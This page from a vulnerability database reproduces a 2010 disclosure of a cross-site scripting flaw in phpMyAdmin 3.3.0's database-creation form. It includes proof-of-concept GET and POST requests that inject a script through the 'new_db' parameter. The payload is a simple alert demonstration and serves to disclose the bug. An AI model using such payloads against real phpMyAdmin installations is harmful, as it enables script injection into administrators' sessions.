Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23379
HistoryMar 15, 2010 - 12:00 a.m.

[XSS] I found a xss in phpmyadmin 3.3.0 when we create new database in interface!

2010-03-1500:00:00
vulners.com
17
JSON

there is a xss in phpmyadmin 3.3.0 when we create new database in interface, the "new_db" parameter do not filter characters when users enter. attacker can enter malicious code, like
"<script>alert(/liscker/);</script>". it also can be true in post and get. but in post, we can not encode xss code, or , the xss will faild.

For example:

GET:

http://localhost/phpmyadmin/db_create.php?token=567eb60e7b1692f64df9251ab7ae3934&amp;reload=1&amp;new_db=&#37;3Cscript&#37;3Ealert&#37;28&#37;2Fliscker&#37;2F&#37;29&#37;3B&#37;3C&#37;2Fscript&#37;3E&amp;db_collation=

POST:

POST /phpmyadmin/db_create.php HTTP/1.1
Accept: /
Referer: http://localhost/phpmyadmin/db_create.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)
Host: localhost
Content-Length: 123
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: phpMyAdmin=95830e770d0f213c04d63b623940f46f95c6f571; pma_lang=en-utf-8; pma_charset=utf-8; pma_collation_connection=utf8_general_ci; pmaUser-1=Hfd255%2Bp2dc%3D; pma_navi_width=200;
pmaPass-1=MlPzQC8J2iY%3D; pma_fontsize=82%25; pma_theme=original
token=759f7a380111a292995ec447408bbdb3&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=

When you test, please replace the session "759f7a380111a292995ec447408bbdb3" with yourself. I suggest to test it in interface.

Liscker
2010.03.12

JSON